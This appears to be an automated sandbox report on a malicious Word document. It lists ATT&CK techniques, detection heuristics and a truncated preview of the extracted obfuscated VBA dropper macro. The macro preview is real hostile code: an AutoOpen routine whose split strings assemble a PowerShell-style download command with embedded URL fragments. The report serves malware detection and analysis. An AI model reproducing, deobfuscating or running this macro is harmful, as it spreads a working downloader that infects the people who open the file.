MALICIOUS (Risk Score: 242)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. ClamAV also identified this file as a known dropper, further supporting its malicious nature. The specific payload or its destination could not be determined due to obfuscation.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6447745-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6447745-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28564 bytes |

SHA-256: 404ca64b25ff948e766c6e9d20ac421dc368fe23ce62086e70dc387d64ca5516
Preview script: first 1,000 lines of the extracted script
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zWOmaFjAMV"
Sub AutoOpen()
On Error Resume Next
cSYsaWiaB = tot - Sgn(XTEwm) - (208205 - Tan(1815453) / 7168362 - ChrW(lnEZ))
iDzQMLJwT = mqkZpXupsfSXGr - Sgn(ozhrLmEWwz) - (4373583 - Tan(758215) / 7329213 - ChrW(ckNEWSGCbT))
NLwuYHHwF = YObEHKhTnaS - Sgn(IIPvETk) - (4985992 - Tan(5319290) / 7338796 - ChrW(NdAqJzps))
Application.Run "oIhXwmJTGrZNrh", SuPcBDfwrP
ZwDHOIIzL = mOAAuCnfcCn - Sgn(fHmrO) - (5293890 - Tan(1412439) / 3902046 - ChrW(VzhsVFAA))
nvWYpoXVM = zCiUmENSwVW - Sgn(hprNQQTHYzmip) - (1375761 - Tan(3429494) / 7562492 - ChrW(SPVBsKRsBLcf))
DIfitOjhb = GCFKzQAf - Sgn(nabiGBspfZ) - (3939381 - Tan(3001795) / 1092440 - ChrW(cVoHAwslFOuI))
End Sub
Function SuPcBDfwrP()
On Error Resume Next
FvvcFbK = ibwtshfQdkabb - Sgn(lMzmFzPRboCb) - (5626126 - Tan(705993) / 905163 - ChrW(OzAqqKtmkqDA))
UaQaUTQCv = vtJH - Sgn(wCDXEJfQAJ) - (8404495 - Tan(3193849) / 742739 - ChrW(LnWbbkzbT))
RBzQz = COtOL - Sgn(usUwFCmrur) - (2203545 - Tan(5019096) / 1891052 - ChrW(vTmcpSZSiXh))
stTMCLak = AnTqYJHl + Mid(lsjcXiRj + "ULtPdfcMZjzjVqwHAR]70+[CH'+'AR]79+[CH'+'AR]82),zh'+'SkmGzhS).RePlacE(([C'+'HAR]74+[CHAR]73+[CHAR'+']117),zhSWzkzhS)'krzL" + UliXjOAJKH, 16, 101)
AABWj = iTuVEb - Sgn(UpUwXiGfSumww) - (1520996 - Tan(1032244) / 9896510 - ChrW(nNwrNMnoz))
BaSalfizcv = npGJbIiEbOTKz - Sgn(tZNpL) - (9617653 - Tan(1288614) / 5588365 - ChrW(RiqcCHd))
zTANq = HYlSqMlLqU - Sgn(dkJ) - (5451201 - Tan(3199216) / 7719618 - ChrW(nzwcBmKVoakfbz))
NwCWfCtS = isVpPQFTPw + Mid(HVJAijjYZRjPic + "NOZG JjpY'+'zhS+zhSte94+e94rye94+e'+'94{e94+e94ctQYe94+eUpY+UpWVaZzZZwOQmqcvU" + ZsHbKw, 8, 55)
qYiNS = KaKtFfCz - Sgn(FwuZXTHYiLlj) - (3862021 - Tan(1934140) / 8359593 - ChrW(dVwhPMji))
DNdTLA = RDLjwUjLQVrK - Sgn(FPXwQzjrqQSXb) - (1889729 - Tan(856315) / 3101234 - ChrW(tNMjGQvo))
YJjbmbKMCQ = qEUDozLjPjJ - Sgn(vlwwam) - (8626702 - Tan(2455142) / 4344486 - ChrW(cuqci))
WhDYwFG = hLmLrDNbiVdDzj + Mid(GaoF + "fAfQZoiBWozPBvdfZm94IZe9wwpvGlILDMPTQLIm" + djiWzIV, 19, 6)
YLkbrIWGHsP = PfSc - Sgn(KZBiQHohiDja) - (3721079 - Tan(3978957) / 4783798 - ChrW(SaDwaOwzTdk))
KzajC = CiwvIsTd - Sgn(jPVlfiRi) - (9550216 - Tan(9461432) / 3061033 - ChrW(WzEPf))
iKitr = vbEKmW - Sgn(iwGnSb) - (301496 - Tan(9181771) / 1831201 - ChrW(KiLujjSWjUO))
AlIipDcRlV = LzwbKjGfWnbTLs + Mid(VGJzbOkfdCbNj + "AlzwjvNLine94+e94'+' ct'+'e94+e94Qe94+e94Ae94+'+'e94DCX)eUpzhS+zhSY+zhS+zhSUpY94+e94{UpY+UwLCjFjOOApSWBaZVpVT" + ZMMUOYQki, 9, 82)
lQAFAtTa = ulnGBB - Sgn(LPHqwiuoJhjquu) - (4137063 - Tan(5183764) / 8319622 - ChrW(GBSWz))
wKbhpsiLQ = HMIGjlWwSBavko - Sgn(kTZENzdY) - (3925012 - Tan(4885188) / 2119938 - ChrW(vvAjoSHikWnEYK))
mXhpt = XtUZqClWhtRj - Sgn(inn) - (6421696 - Tan(4712971) / 7814763 - ChrW(ASUldcGoN))
LiPDWOGI = lrjciXBVZdw + Mid(AlKrfVO + "ffiflJBiO4+e94Nzh'+'S'+'+zhSSe94+e94B = zhS+zhScwUYCTX" + NOuhUS, 10, 39)
ovkmU = YiwN - Sgn(wIBYkjrYJnhEuQ) - (5326652 - Tan(9825790) / 6382265 - ChrW(uWCsfa))
fLJEkbj = zUXzGSDGwOQR - Sgn(mCOfnv) - (4619492 - Tan(5367168) / 7896395 - ChrW(KGrTBrt))
zZvWNoDX = caj - Sgn(MTYCVizwCKhR) - (5552702 - Tan(8581673) / 1604607 - ChrW(EkCNIBNt))
HquPr = UjDKFiAzUuK + Mid(SnWiFEwi + "UzjipBPEEKvRAkuPNdXFzQS+zhS4ne94+e94ve94+e94oOIe'+'94+e94Z+OIZke94+e94UzhS+zhSp'+'Y+UpYOIZ+e94+e94OIe94+e94ID" + fjjm, 23, 85)
JiQVoGqJ = fKGfmWdi - Sgn(rWqliCNPTKJiP) - (7140919 - Tan(2613090) / 3825077 - ChrW(IsjhLvSJTiob))
bNsjqIFCR = DPvBYcinMGVHfh - Sgn(nPZsLw) - (2650684 - Tan(7135245) / 483075 - ChrW(jbYbK))
wdzbmaIJZNF = ZnVHtmNM - Sgn(lCwmKafNCWE) - (995223 - Tan(9082319) / 3166459 - ChrW(pit))
bfIkK = wBPEKnqjw + Mid(uHlZtisQzZZq + "IYppcpsjbe94+e94ce94+e94egezhS+zhSUpY+UpYorgia.co'+'m/avUpY+UpYt2Be94'+'+e94FL/?http:'+'e94+e9zhS+zhS4//e94+e94www.sue94+e94a'+'cuasae9'+'4+e94zhS+zhSt.ve9UpY+UpYz'+'hS+zhS4Up'+'Y+'+'UpY+e94n/UpRVL
```
... (truncated)